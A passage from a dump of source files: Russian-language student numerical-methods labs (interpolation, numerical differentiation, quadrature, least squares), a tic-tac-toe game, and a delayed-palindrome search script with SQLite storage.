xCount)\n\n print(xMas, yMas)\n xNeed = float(input('Введите x > '))\n\n pos = interval(xMas, yMas, xNeed)\n res = spline(xMas, yMas, xStep, xNeed)\n print(\"Вычисленное значение f(x): {:.4f}\".format(res))\n print(\"Точное значение f(x): {:.4f}\".format(f(xNeed)))\n print(\"Погрешность: {:.2f}%\".format(10 * (1 - res / f(xNeed))))" }, { "alpha_fraction": 0.536203145980835, "alphanum_fraction": 0.5547550320625305, "avg_line_length": 32.04166793823242, "blob_id": "4ea89e3ea9d4244a2027c1337e59767bf7be133a", "content_id": "752fa8f9dec401585ad617519c74e482040a2b62", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5960, "license_type": "no_license", "max_line_length": 116, "num_lines": 168, "path": "/FirstLab/FirstLab.py", "repo_name": "MrSkl1f/CA", "src_encoding": "UTF-8", "text": "import math\nfrom math import radians\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nclass HalfDivisionMethod:\n def __init__(self, a, b):\n self.eps = 1e-5\n self.a = a\n self.b = b\n \n def MPD(self):\n a = self.a\n b = self.b\n while abs(b - a) > self.eps:\n x = (a + b) / 2.0\n fx = func(x)\n fa = func(a)\n if (fx < 0 and fa < 0) or (fx > 0 and fa > 0):\n a = x\n else:\n b = x\n return x\n\nclass ConventionalInterpolation:\n def __init__(self, n, x, ArrForX, ArrForY):\n self.PolynomialDegree = n\n self.FindNum = x\n self.table = [ArrForX, ArrForY]\n\n def ModifyTable(self, table, n):\n for i in range(n):\n tmp = []\n for j in range(n-i):\n tmp.append((table[i+1][j] - table[i+1][j+1]) / (table[0][j] - 
table[0][i+j+1]))\n #print(table[0][j], table[0][i+j+1])\n table.append(tmp)\n return table\n\n def CreateIterval(self, n, x):\n MaxLength = len((self.table)[0])\n InderxNear = abs((self.table)[0][0] - x)\n for i in range(MaxLength):\n if abs((self.table)[0][i] - x) < InderxNear:\n InderxNear = abs((self.table)[0][i] - x)\n\n #InderxNear = min(range(MaxLength), key = lambda i: abs((self.table)[0][i] - x))\n SpaceInFirstTable = math.ceil(n / 2) \n \n if (InderxNear + SpaceInFirstTable + 1 > MaxLength): \n IndexForEnd = MaxLength\n IndexForStart = MaxLength - n\n elif (InderxNear < SpaceInFirstTable):\n IndexForStart = 0\n IndexForEnd = n\n else:\n IndexForStart = InderxNear - SpaceInFirstTable + 1\n IndexForEnd = IndexForStart + n \n\n return [self.table[0][IndexForStart:IndexForEnd], self.table[1][IndexForStart:IndexForEnd]]\n\n def printTable(self):\n print(self.table)\n\n def interpolate(self):\n self.table = self.CreateIterval(self.PolynomialDegree + 1, self.FindNum)\n #print(self.table)\n CreatedMatrix = self.ModifyTable(self.table, self.PolynomialDegree)\n #print(CreatedMatrix)\n tmp = 1\n res = 0\n for i in range(self.PolynomialDegree+1):\n res += tmp * CreatedMatrix[i+1][0]\n tmp *= (self.FindNum - CreatedMatrix[0][i])\n\n return res\n\ndef InputData(CheckException):\n try:\n PolynomialDegree = int(input(\"Введите степень полинома (целое, больше 0) > \"))\n #if PolynomialDegree <= 0:\n # print(\"Степень должна быть больше 0\")\n # CheckException = 0\n # return 0, 0, 0\n if PolynomialDegree > 11:\n print(\"Степень должна быть меньше либо равна кол-ву элементов таблицы\")\n CheckException = 0\n return 0, 0, 0\n except:\n print(\"Неправильный ввод степени полинома\\n\")\n CheckException = 0\n if CheckException:\n try:\n FindNum = float(input(\"Введите x (или y для обратной), относительно которого искать (вещественное) > \"))\n return PolynomialDegree, FindNum, CheckException\n except:\n print(\"Неправильный ввод x\\n\")\n CheckException = 0\n return 0, 0, 0\n\ndef InputDataForMethod(CheckException):\n try:\n a = float(input(\"Введите начало промежутка > \"))\n except:\n CheckException = 0\n print(\"Число должно быть целым!\")\n return 0, 0, 0\n if CheckException:\n try:\n b = float(input(\"Введите конец промежутка > \"))\n if b < a:\n CheckException = 0\n print(\"Число должно быть меньше начала промежутка!\")\n return 0, 0, 0\n elif b == a:\n CheckException = 0\n print(\"Число должно быть строго больше начала промежутка!\")\n return 0, 0, 0\n except:\n CheckException = 0\n print(\"Число должно быть целым!\")\n return 0, 0, 0\n return a, b, CheckException\n\ndef func(x):\n return x ** 3 + 1\n\nCheckException = 1\n\nPolynomialDegree, FindNum, CheckException = InputData(CheckException)\nif CheckException:\n ArrayForX = []\n StartX = -3\n for i in range(11):\n ArrayForX.append(StartX)\n StartX += 1\n ArrayForY = []\n for i in range(11):\n ArrayForY.append(func(ArrayForX[i]))\n for i in range (11):\n print(ArrayForX[i], ArrayForY[i])\n #ArrayForX = []\n #ArrayForY = []\n #ArrayForX = [1, 3, 4, 5]\n #ArrayForY = [2, -0.5, -10, 1]\n\n ObjectForResult = ConventionalInterpolation(PolynomialDegree, FindNum, ArrayForX, ArrayForY)\n Result = ObjectForResult.interpolate()\n print(\"\\nInterpolated: %.3f\" % Result)\n if CheckException:\n ObjectForResultReverse = ConventionalInterpolation(PolynomialDegree, 0, ArrayForY, ArrayForX)\n Result = ObjectForResultReverse.interpolate()\n print(\"Interpolated reverse: %.3f\" % Result)\n a, b, CheckException = InputDataForMethod(CheckException)\n if 
CheckException:\n ObjectForResultWithMethor = HalfDivisionMethod(a, b)\n Result = ObjectForResultWithMethor.MPD()\n print(\"Method: %.3f\" % Result)\n\n x = np.linspace(-1.0, 3.0, num=20)\n y = [func(i) for i in x]\n\n plt.title(\"Линейная зависимость y = x ** 3 + 1\") # заголовок\n plt.xlabel(\"x\")\n plt.ylabel(\"y\") \n plt.grid() \n plt.plot(x, y) \n plt.show()\n\n" }, { "alpha_fraction": 0.45167285203933716, "alphanum_fraction": 0.4843866229057312, "avg_line_length": 26.4489803314209, "blob_id": "35944f35c018c073415d0896ab7426d71edde072", "content_id": "13326e7eed174d36ecbb3d09463f2963d99f3d1b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2690, "license_type": "no_license", "max_line_length": 195, "num_lines": 98, "path": "/SixthLab/6lab.py", "repo_name": "MrSkl1f/CA", "src_encoding": "UTF-8", "text": "def leftSide(y, h):\n res = []\n length = len(y)\n res.append('None')\n for i in range(1, length):\n res.append((y[i] - y[i - 1]) / h)\n return res\n\ndef rightSide(y, h):\n res = []\n length = len(y)\n for i in range(length - 1):\n res.append((y[i + 1] - y[i]) / h)\n res.append('None')\n return res\n\ndef centerSide(y, h):\n res = []\n length = len(y)\n step = 2 * h\n res.append('None')\n for i in range(1, length - 1, 1):\n res.append((y[i + 1] - y[i - 1]) / step)\n res.append('None')\n return res\n \ndef rungeLeft(y, h):\n res = []\n length = len(y)\n for i in range(2):\n res.append('None')\n for i in range(2, length):\n res.append(2 * ((y[i] - y[i - 1]) / h) - ((y[i] - y[i - 2]) / (2 * h)))\n return res\n\ndef rungeRight(y, h):\n res = []\n length = len(y)\n for i in range(length - 2):\n res.append(2 * ((y[i + 1] - y[i]) / h) - ((y[i + 2] - y[i]) / (2 * h)))\n for i in range(2):\n res.append('None')\n return res\n\ndef aligmentVariablesRight(x, y, h):\n res = []\n length = len(y)\n for i in range(0, length - 2):\n res.append((1 / y[i + 1] - 1 / y[i]) / (1 / x[i + 1] - 1 / x[i]) * y[i]**2 / x[i]**2)\n for i in range(2):\n res.append('None')\n return res\n\ndef aligmentVariablesLeft(x, y, h):\n res = []\n length = len(y)\n for i in range(2):\n res.append('None')\n for i in range(0, length - 2):\n res.append((1 / y[i] - 1 / y[i - 1]) / (1 / x[i] - 1 / x[i - 1]) * y[i]**2 / x[i]**2)\n return res\n\ndef secondDifference(x, y, h):\n res = []\n length = len(y)\n res.append('None')\n for i in range(1, length - 1):\n res.append((y[i - 1] - 2 * y[i] + y[i + 1]) / h ** 2)\n res.append('None')\n return res\n\ndef main():\n h = 1\n x = [i for i in range(1, 7, 1)]\n y = [0.571, 0.889, 1.091, 1.231, 1.333, 1.412]\n \n for line in [leftSide(y, h), rightSide(y, h), centerSide(y, h), rungeLeft(y ,h), rungeRight(y ,h), aligmentVariablesLeft(x, y, h), aligmentVariablesRight(x, y, h), secondDifference(x, y, h)]:\n for j in range(len(line)):\n element = line[j]\n if element != 'None':\n print('{:5.3}'.format(element), end=' ')\n continue\n print(element, end=' ')\n print()\n \n #print(leftSide(y, h))\n #print(rightSide(y, h))\n #print('*' * 20)\n #print(centerSide(y, h))\n #print('*' * 20)\n #print(rungeLeft(y ,h))\n #print(rungeRight(y, h))\n #print('*' * 20)\n #print(aligmentVariablesLeft(x, y, h))\n #print(aligmentVariablesRight(x, y, h))\n #print('*' * 20)\n #print(secondDifference(x, y, h))\nmain()\n" }, { "alpha_fraction": 0.5606177449226379, "alphanum_fraction": 0.5837838053703308, "avg_line_length": 29.11627960205078, "blob_id": "a4bb9c731d86527fbca93cf9a82088e8316bb445", "content_id": "ba58ce392d48e31fabc215112dd007ce8d0a64cc", 
"detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2658, "license_type": "no_license", "max_line_length": 91, "num_lines": 86, "path": "/SecondLab/SecondLab.py", "repo_name": "MrSkl1f/CA", "src_encoding": "UTF-8", "text": "import math\n\ndef ModifyTable(table, n):\n for i in range(n):\n tmp = []\n for j in range(n-i):\n tmp.append((table[i+1][j] - table[i+1][j+1]) / (table[0][j] - table[0][i+j+1]))\n table.append(tmp)\n return table\n\ndef CreateItervalForNeed(table, n, x):\n MaxLength = len((table))\n InderxNear = abs((table)[0] - x)\n for i in range(MaxLength):\n if abs((table)[i] - x) < InderxNear:\n InderxNear = abs((table)[i] - x)\n\n SpaceInFirstTable = math.ceil(n / 2) \n \n if (InderxNear + SpaceInFirstTable + 1 > MaxLength): \n IndexForEnd = MaxLength\n IndexForStart = MaxLength - n\n elif (InderxNear < SpaceInFirstTable):\n IndexForStart = 0\n IndexForEnd = n\n else:\n IndexForStart = InderxNear - SpaceInFirstTable + 1\n IndexForEnd = IndexForStart + n \n\n return table[IndexForStart:IndexForEnd]\n\ndef CreateIterval(table, n, x):\n MaxLength = len((table)[0])\n InderxNear = abs((table)[0][0] - x)\n for i in range(MaxLength):\n if abs((table)[0][i] - x) < InderxNear:\n InderxNear = abs((table)[0][i] - x)\n\n SpaceInFirstTable = math.ceil(n / 2) \n \n if (InderxNear + SpaceInFirstTable + 1 > MaxLength): \n IndexForEnd = MaxLength\n IndexForStart = MaxLength - n\n elif (InderxNear < SpaceInFirstTable):\n IndexForStart = 0\n IndexForEnd = n\n else:\n IndexForStart = InderxNear - SpaceInFirstTable + 1\n IndexForEnd = IndexForStart + n \n\n return [table[0][IndexForStart:IndexForEnd], table[1][IndexForStart:IndexForEnd]]\n\ndef interpolate(PolynomialDegree, FindNum, table):\n table = CreateIterval(table, PolynomialDegree + 1, FindNum)\n #print(table)\n CreatedMatrix = ModifyTable(table, PolynomialDegree)\n #print(CreatedMatrix)\n tmp = 1\n res = 0\n for i in range(PolynomialDegree+1):\n res += tmp * CreatedMatrix[i+1][0]\n tmp *= (FindNum - CreatedMatrix[0][i])\n\n return res\n\nif __name__ == \"__main__\":\n #try:\n x = float(input('Введите x >'))\n y = float(input('Введите y >'))\n nx = int(input('введите степень полинома по x >'))\n ny = int(input('введите степень полинома по y >'))\n #except:\n # print('Ошибка')\n ArrX = [0,1,2,3]\n ArrY = [0,1,2,3]\n MatrZnach = [\n [0,1,4,9], \n [1,2,5,10],\n [4,5,8,13],\n [9,10,13,18]]\n newZnach = []\n for i in range(len(ArrX)):\n newZnach.append(interpolate(ny, y, [ArrY, MatrZnach[i]]))\n print(newZnach)\n print(interpolate(nx, x, [ArrX, newZnach]))\n print(x ** 2 + y ** 2)\n" }, { "alpha_fraction": 0.5530243515968323, "alphanum_fraction": 0.5758051872253418, "avg_line_length": 25, "blob_id": "d318b54f651e4aadae27f143f00a4c8bb7999e81", "content_id": "90e7e69111dbdf631df0d003580f7b352a540a25", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1314, "license_type": "no_license", "max_line_length": 94, "num_lines": 49, "path": "/FifthLab/5lab.py", "repo_name": "MrSkl1f/CA", "src_encoding": "UTF-8", "text": "from numpy.polynomial.legendre import leggauss\nfrom math import *\n\n\n\ndef replacement(x, y):\n return 2 * cos(x) / (1 - pow(sin(x), 2) * pow(cos(y), 2))\n\ndef function(parameter):\n return lambda x, y: (4 / pi) * (1 - exp(-parameter * replacement(x, y))) * cos(x) * sin(x)\n\ndef variableForConvertion(t):\n return (pi / 2) / 2 + (pi / 2) * t / 2\n\ndef gauss(func, nodes):\n args, coeffs = leggauss(nodes)\n res = 0\n for i in 
range(nodes):\n res += (pi / 2) / 2 * coeffs[i] * func(variableForConvertion(args[i]))\n return res\n\ndef simpson(func, nodes):\n h = (pi / 2) / (nodes - 1)\n x = 0\n res = 0\n for i in range((nodes - 1) // 2):\n res += func(x) + 4 * func(x + h) + func(x + 2 * h)\n x += 2 * h\n return res * (h / 3)\n\ndef convert(secondFunction, value):\n return lambda y: secondFunction(value, y)\n\ndef convertSimpson(func, M):\n return lambda x: simpson(convert(func, x), M)\n\ndef result(func, N, M, parameter):\n return gauss(convertSimpson(func, M), N)\n\ndef main():\n N = int(input(\"\\033[36m» Введите N: \"))\n M = int(input(\"» Введите M: \"))\n parameter = float(input(\"» Введите параметр: \"))\n\n print(\"Результат: \", round(result(function(parameter),N, M, parameter), 5))\n\n\nif __name__ == \"__main__\":\n main()" }, { "alpha_fraction": 0.539710283279419, "alphanum_fraction": 0.5604395866394043, "avg_line_length": 28.448530197143555, "blob_id": "f8d92f34f64e09f0b302007d9499994e3948bcb9", "content_id": "62d99301814614f6bea6f29ae659aeddc0626cbe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4692, "license_type": "no_license", "max_line_length": 98, "num_lines": 136, "path": "/FourthLab/main.py", "repo_name": "MrSkl1f/CA", "src_encoding": "UTF-8", "text": "'''\nПринципиальным отличием задачи среднеквадратичного приближения от задачи интерполяции является то,\nчто число узлов превышает число параметров. В данном случае практически всегда не найдется такого\nвектора параметров, для которого значения аппроксимирующей функции совпадали бы со значениями\nаппроксимируемой функции во всех узлах.\nВ этом случае задача аппроксимации ставится как задача поиска такого вектора параметров\ncoefs = (c0, ..., cn)T, при котором значения аппроксимирующей функции как можно меньше отклонялись\nбы от значений аппроксимируемой функции F(x, coefs) в совокупности всех узлов.\n'''\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\ndef f(points, coefs):\n res = [0.] * points\n for i in range(len(coefs)):\n res += coefs[i] * (points ** i)\n return res\n\n# Считать данные с файла\ndef read_file(filename):\n f = open(filename, \"r+\")\n x, y, weight = [], [], []\n for s in f:\n s = s.split(\" \")\n x.append(float(s[0]))\n y.append(float(s[1]))\n weight.append(float(s[2]))\n f.close()\n return x, y, weight\n\ndef print_table(x, y, weight):\n print(\"x y weight\")\n for i in range(len(x)):\n print(\"%.4f %.4f %.4f\" % (x[i], y[i], weight[i]))\n print()\n\ndef print_mtr(matrix):\n for i in matrix:\n print(i)\n\n# методом Гаусса\ndef solveSLAE(matrix):\n length = len(matrix)\n # приводим к треугольному виду\n for k in range(length):\n for i in range(k + 1, length):\n t = - (matrix[i][k] / matrix[k][k])\n for j in range(k, length + 1):\n matrix[i][j] += t * matrix[k][j]\n\n coefs = []\n for i in range(length):\n coefs.append(0) \n\n # Снизу вверх вычисляем каждый коэффициент\n # Получилась матрица вида:\n # a0 a1 a2 a3 a4 ...\n # Сама матрица:\n # x0 x1 x2 x3 ... y0 \n # 0 x1 x2 x3 ... y1 \n # 0 0 x2 x3 ... 
y2 \n # ...\n for i in range(length - 1, -1, -1):\n for j in range(length - 1, i, -1):\n matrix[i][length] -= coefs[j] * matrix[i][j]\n coefs[i] = matrix[i][length] / matrix[i][i]\n return coefs\n\ndef createMatr(x, y, weight, n, N):\n # Заполняем матрицу нулями\n matrix = []\n for i in range(n + 1):\n matrix.append([])\n for j in range(n + 2):\n matrix[i].append(0)\n\n # Составляем систему уравнение sum((x^k, x^m) * am) = (y, x^k)\n\n # Считаем (x^k, x^m) = sum(pi * xi^(k + m))\n for k in range(n + 1):\n for m in range(n + 1):\n curValue = 0\n for i in range(len(x)):\n curValue += pow(x[i], (k + m)) * weight[i]\n matrix[k][m] = curValue\n \n # Считаем (y, x^k) = sum(pi * yi * xi^k)\n for k in range(n + 1):\n curValue = 0\n for i in range(len(x)):\n curValue += y[i] * pow(x[i], k) * weight[i]\n matrix[k][n + 1] = curValue\n\n coefs = solveSLAE(matrix)\n \n return coefs\n\n'''\n#print(\"MATRIX\\n\")\n#print_mtr(matrix)\n\n#print(\"\\nCOEFFICIENTS\\n\\n\", coefs)\nprint(\"\\nAPPROXIMATION FUNCTION\\n\\nF = \", round(coefs[0], 2), sep=\"\", end=\"\")\nfor i in range(1, len(coefs)):\n print(\" + (\", round(coefs[i], 2), \") * x ** \", i, sep=\"\", end=\"\")\n''' \n\ndef make_plot(coefs, x, y, weight, dots):\n plt.figure(1)\n plt.plot(dots, f(dots, coefs))\n\n n = 1\n x2, y2, weight2 = read_file(\"dots2.txt\")\n N = len(x2)\n coefs2 = createMatr(x2, y2, weight2, n, N)\n dots2 = np.arange(x2[0] - 2, x2[len(x2) - 1] + 2, 0.01)\n plt.plot(dots2, f(dots2, coefs2), color=\"gray\")\n\n plt.ylabel(\"Y\")\n plt.xlabel(\"X\")\n for i in range(len(x)):\n plt.plot(x[i], y[i], 'ro', markersize=weight[i] + 2)\n plt.show()\n\ndef main():\n x, y, weight = read_file(\"dots.txt\")\n N = len(x) - 1 # количество узлов\n n = int(input(\"Enter the degree of the polynomial: \"))\n print(\"n = \", n, \" N = \", N)\n print_table(x, y, weight)\n coefs = createMatr(x, y, weight, n, N)\n dots = np.arange(x[0] - 2, x[len(x) - 1] + 2, 0.01)\n make_plot(coefs, x, y, weight, dots)\n\nmain()" } ]
6
utkarshrai/AskRai
https://github.com/utkarshrai/AskRai
d7e7d441c292cfe0e8d26d5bda0a4940610a91f0
0194c24c28153ad21cbcd76f5b82f03f409a80ec
d03b8f5a1085ec779a5fceeec4db6888aa83d908
refs/heads/master
2020-12-31T00:29:46.922898
2017-11-05T07:57:31
2017-11-05T07:57:31
85,419,215
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.478083074092865, "alphanum_fraction": 0.5099771022796631, "avg_line_length": 22.976470947265625, "blob_id": "4e5e8abcef747bc1426644dc1a509f6056bc1008", "content_id": "9d4c907127ffe9a8db32e954bd761c8fa0f2321b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6114, "license_type": "no_license", "max_line_length": 127, "num_lines": 255, "path": "/abc.py", "repo_name": "utkarshrai/AskRai", "src_encoding": "UTF-8", "text": "import sys\nimport random\n\n#Setting up Terminal Display, Seems clearer with underscores compared to dashes\ndef terminalDisplay():\n c=0\n for i in field[:2]:\n for j in i[:2]:\n print('', j, '|', end='')\n print('', field[c][2])\n c+=1\n print ('___|___|___')\n print ('', field[2][0], '|', field[2][1], '|', field[2][2])\n\n#Numbering from 1 to 9 on the grid\nfield = [[1, 2, 3], [4, 5, 6], [7, 8, 9]]\n\n#Initial Interaction with the game\nplayer = input('Player Name : ')\nprint('Welcome to Utkarsh\\'s impossible Tic Tac Toe ', player)\nterminalDisplay()\nfirst = input('Do you want to move first: YES or NO? ')\n\n#Making lists of all posible moves and win possiblities \nmoveChoices = ['1', '2', '3', '4', '5', '6', '7', '8', '9']\nwinGame = [['1','2','3'], ['1','4','7'], ['1','5','9'], ['4','5','6'],['7','8','9'], ['2','5','8'],['3','6','9'],['3','5','7']]\n\nfirstAdvantage = ['5', '1', '3', '7', '9']\n\nsecondAdvantage = [['5', '1'], ['5', '3'], ['5', '7'],\n ['5', '9'], ['1', '3'], ['3', '9'],\n ['7', '9'], ['1', '7']]\n\nthirdAdvantage = [['1', '3', '5'], ['3', '5', '9'], ['7', '5', '9'],\n ['1', '5', '7'], ['1', '3', '9'], ['1', '3', '7'],\n ['7', '9', '3'], ['2', '4', '1'], ['2', '3', '6'],\n ['6', '9', '8'], ['4', '7', '8']]\n\n\n\nmoveCounter = 0\nmatchOver = False\nuserMoves = []\nmyMoves = []\nif (first == \"NO\"):\n print ('My turn: ')\n\n if (len(moveChoices) > 0):\n myMove = think()\n\n if (myMove in moveChoices):\n moveChoices.remove(myMove)\n else:\n print ('Ah! I wanted to win.')\n\n populate(myMove, 'o')\n\n terminalDisplay()\n\n moveCounter += 1\n'If player gets three in a row, player wins'\ndef checkWin(pos1, pos2, pos3, player):\n if ((pos1 is player) and (pos2 is player) and (pos3 is player)):\n playerWins = True\n draw = False\n else:\n playerWins = False\n return playerWins\n\n\n'Check all possible win scenarios for a player.'\ndef checkWinner(player):\n for i in range(3):\n win = checkWin(field[i][0], field[i][1], field[i][2], player)\n if win:\n if player is 'o':\n print('Victory for me! told you, impossible ! ')\n else:\n print ('You won?! You are amazing!')\n draw = False\n sys.exit(0)\n for i in range(3):\n win = checkWin(field[0][i], field[1][i], field[2][i], player)\n if win:\n if player is 'o':\n print('Victory for me! told you, impossible ! ')\n else:\n print ('You won?! You are amazing!')\n draw = False\n sys.exit(0)\n win = checkWin(field[0][0], field[1][1], field[2][2], player)\n if win:\n if player is 'o':\n print('Victory for me! told you, impossible ! ')\n else:\n print ('You won?! You are amazing!')\n draw = False\n sys.exit(0)\n\n win = checkWin(field[0][2], field[1][1], field[2][0], player)\n if win:\n if player is 'o':\n print('Victory for me! old you, impossible ! ')\n else:\n print ('You won?! 
You are amazing!')\n draw = False\n sys.exit(0)\ncounter = 0\n'Defines coordinates of each numbered position on board.'\ndef switch(x):\n return {\n '1': [0, 0],\n '2': [0, 1],\n '3': [0, 2],\n '4': [1, 0],\n '5': [1, 1],\n '6': [1, 2],\n '7': [2, 0],\n '8': [2, 1],\n '9': [2, 2]\n }[x]\n\n\n'Fills a position with players move.'\ndef populate(x, side):\n nums = switch(x)\n field[nums[0]][nums[1]] = side\n\n\n'Anticipate win or advantage for each player.'\ndef think():\n if moveCounter is 0:\n tInput = '5'\n elif moveCounter is 1:\n if userMoves[-1] is '5':\n tInput = '1'\n else:\n tInput = '5'\n else:\n tInput = anticipateWin()\n if tInput is '0':\n tInput = anticipateUserWin()\n if tInput is '0':\n tInput = anticipateAdvantage()\n if tInput is '0':\n tInput = anticipateUserAdvantage()\n if tInput is '0':\n tInput = random.choice(moves)\n myMoves.append(tInput)\n return tInput\n\n\ndef anticipate(posList, whoMoves):\n tInput = '0'\n for lis in posList:\n commonEl = set(whoMoves) & set(lis)\n if len(commonEl) > 1:\n for el in lis:\n if el not in commonEl:\n if el in moveChoices:\n tInput = el\n break\n break\n return tInput\n\n\ndef anticipateWin():\n tInput = anticipate(winGame, myMoves)\n return tInput\n\n\ndef anticipateUserWin():\n tInput = anticipate(winGame, userMoves)\n return tInput\n\n\ndef anticipateUserAdvantage():\n if len(userMoves) < 2:\n tInput = anticipate(secondAdvantage, userMoves)\n else:\n tInput = anticipate(thirdAdvantage, userMoves)\n return tInput\n\n\ndef anticipateAdvantage():\n tInput = '0'\n if len(myMoves) < 2:\n tInput = anticipate(secondAdvantage, myMoves)\n else:\n tInput = anticipate(thirdAdvantage, myMoves)\n return tInput\n\n\n\n\nif (first is 'NO'):\n print ('My turn: ')\n\n if (len(moveChoices) > 0):\n myMove = think()\n\n if (myMove in moveChoices):\n moveChoices.remove(myMove)\n else:\n print ('Ah! I wanted to win.')\n\n populate(myMove, 'o')\n\n terminalDisplay()\n\n moveCounter += 1\n\ndraw = True\n\nwhile (moveCounter < 9):\n\n move = input('Choose your move: ')\n\n userMoves.append(move)\n if (len(moveChoices) >= 0):\n moveChoices.remove(move)\n else:\n break\n\n populate(move, 'x')\n\n terminalDisplay()\n\n moveCounter += 1\n\n checkWinner('x')\n\n print ('My turn: ')\n\n if len(moveChoices) > 0:\n myMove = think()\n\n if (myMove in moveChoices):\n moveChoices.remove(myMove)\n else:\n print ('Ah! I wanted to win.')\n break\n\n populate(myMove, 'o')\n\n terminalDisplay()\n\n moveCounter += 1\n\n checkWinner('o')\n\nif draw:\n print ('Draw')\nelse:\n print('Something\\'s not right')\n" }, { "alpha_fraction": 0.8136646151542664, "alphanum_fraction": 0.8136646151542664, "avg_line_length": 79.5, "blob_id": "06ebeffc88de2736cd13fae6eae0a91367242e93", "content_id": "173a5aca59e701416f7acdfacf445f558e8dd583", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 161, "license_type": "no_license", "max_line_length": 151, "num_lines": 2, "path": "/README.md", "repo_name": "utkarshrai/AskRai", "src_encoding": "UTF-8", "text": "# AskRai\nI'm trying to upload screenshots and some written instructions that shall prove useful to anyone who's beginning ML in Python on a Debian distribution.\n" } ]
2
meownoid/add-and-reverse
https://github.com/meownoid/add-and-reverse
01a4a5c96f6225627cb60ffdcde4a7dee12412ab
cdeb81c14aed07e0086ab56857a03150212e2f5a
42969c057fba7db4d7376c58f790711d2e898064
refs/heads/master
2022-12-02T12:08:13.276127
2022-11-21T21:20:12
2022-11-21T21:20:12
188,548,616
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5558829307556152, "alphanum_fraction": 0.5607935786247253, "avg_line_length": 23.242856979370117, "blob_id": "960ce08e51bee82ce6cbfa764324f0ae2b13f87d", "content_id": "00f4d143476850b9a4f4b06745dfb3445d199b0f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5091, "license_type": "permissive", "max_line_length": 88, "num_lines": 210, "path": "/main.py", "repo_name": "meownoid/add-and-reverse", "src_encoding": "UTF-8", "text": "import datetime\nimport sqlite3\nimport argparse\nimport time\nfrom collections import ChainMap\nfrom typing import Dict\nfrom multiprocessing import Pool\n\nfrom _fast import check_range\n\n\ndef prepare_db(conn: sqlite3.Connection) -> None:\n cur = conn.cursor()\n\n cur.execute(\n \"\"\"\n CREATE TABLE IF NOT EXISTS results(\n date text,\n iterations integer UNIQUE NOT NULL,\n number integer\n )\n \"\"\"\n )\n\n cur.execute(\n \"\"\"\n CREATE TABLE IF NOT EXISTS meta (\n date text,\n last_number integer\n )\n \"\"\"\n )\n\n conn.commit()\n\n\ndef load_results(conn: sqlite3.Connection) -> Dict[int, int]:\n cur = conn.cursor()\n\n return dict(cur.execute(\"SELECT iterations, number FROM results;\"))\n\n\ndef load_last_number(conn: sqlite3.Connection) -> int:\n cur = conn.cursor()\n\n result = cur.execute(\n \"SELECT max(last_number) AS last_number FROM meta;\"\n ).fetchone()[0]\n\n return 1 if result is None else result\n\n\ndef insert_result(conn: sqlite3.Connection, iterations: int, number: int) -> None:\n cur = conn.cursor()\n\n cur.execute(\n \"INSERT INTO results (date, iterations, number) VALUES (?, ?, ?)\",\n (datetime.datetime.now(), iterations, number),\n )\n\n\ndef insert_last_number(conn: sqlite3.Connection, last_number: int) -> None:\n cur = conn.cursor()\n\n cur.execute(\n \"INSERT INTO meta (date, last_number) VALUES (?, ?)\",\n (datetime.datetime.now(), last_number),\n )\n\n\ndef main():\n parser = argparse.ArgumentParser(\n description=\"Utility for search of the most delayed palindromes\"\n )\n parser.add_argument(\n \"--database\",\n \"-d\",\n dest=\"database\",\n action=\"store\",\n default=\"db.sqlite\",\n help=\"path to the database file\",\n )\n parser.add_argument(\n \"--threads\",\n \"-t\",\n dest=\"threads\",\n type=int,\n action=\"store\",\n default=1,\n help=\"number of threads\",\n )\n parser.add_argument(\n \"--numbers\",\n \"-n\",\n dest=\"numbers\",\n type=int,\n action=\"store\",\n default=100000,\n help=\"number of numbers to check in one thread\",\n )\n parser.add_argument(\n \"--start\",\n \"-s\",\n dest=\"start\",\n type=int,\n action=\"store\",\n default=None,\n help=\"overrides starting number\",\n )\n parser.add_argument(\n \"--quiet\",\n \"-q\",\n dest=\"quiet\",\n action=\"store_const\",\n const=True,\n default=False,\n help=\"quiet mode\",\n )\n parser.add_argument(\n \"--results\",\n \"-r\",\n dest=\"results\",\n action=\"store_const\",\n const=True,\n default=False,\n help=\"show results and exit\",\n )\n parser.add_argument(\n \"--benchmark\",\n \"-b\",\n dest=\"benchmark\",\n action=\"store_const\",\n const=True,\n default=False,\n help=\"run benchmark while computing and display results\",\n )\n\n args = parser.parse_args()\n\n assert args.threads > 0\n assert args.numbers > 0\n assert args.start >= 0 if args.start is not None else True\n\n conn = sqlite3.connect(args.database)\n\n prepare_db(conn)\n\n old_results = load_results(conn)\n\n if args.results:\n for iterations, result in sorted(old_results.items()):\n 
print(f\"{iterations:8d} : {result:16d}\")\n\n return\n\n new_results = {}\n all_results = ChainMap(old_results, new_results)\n\n start = args.start if args.start is not None else load_last_number(conn)\n\n ranges = []\n end = start\n for _ in range(args.threads):\n ranges.append((end, end + args.numbers))\n end += args.numbers\n\n if not args.quiet:\n print(f\"Start: {start}\")\n print(f\"End: {end - 1}\")\n print(f\"Number of threads: {args.threads}\")\n\n with Pool(args.threads) as pool:\n start_time = time.time()\n for res in pool.starmap(check_range, ranges, chunksize=1):\n for key, value in res.items():\n if key not in all_results:\n new_results[key] = value\n continue\n\n if value < all_results[key]:\n new_results[key] = value\n elapsed_time = time.time() - start_time\n\n if args.benchmark:\n numbers_per_second = args.numbers / elapsed_time\n numbers_per_second_per_thread = numbers_per_second / args.threads\n print(\"Benchmark results:\")\n print(f\" Total time: {elapsed_time:.3f} seconds\")\n print(f\" Numbers per second: {int(numbers_per_second):d}\")\n print(\n f\" Numbers per second per thread: {int(numbers_per_second_per_thread):d}\"\n )\n\n for key, value in new_results.items():\n insert_result(conn, key, value)\n\n insert_last_number(conn, end)\n\n if not args.quiet:\n print(f\"Found new numbers: {len(new_results)}\")\n\n conn.commit()\n conn.close()\n\n if not args.quiet:\n 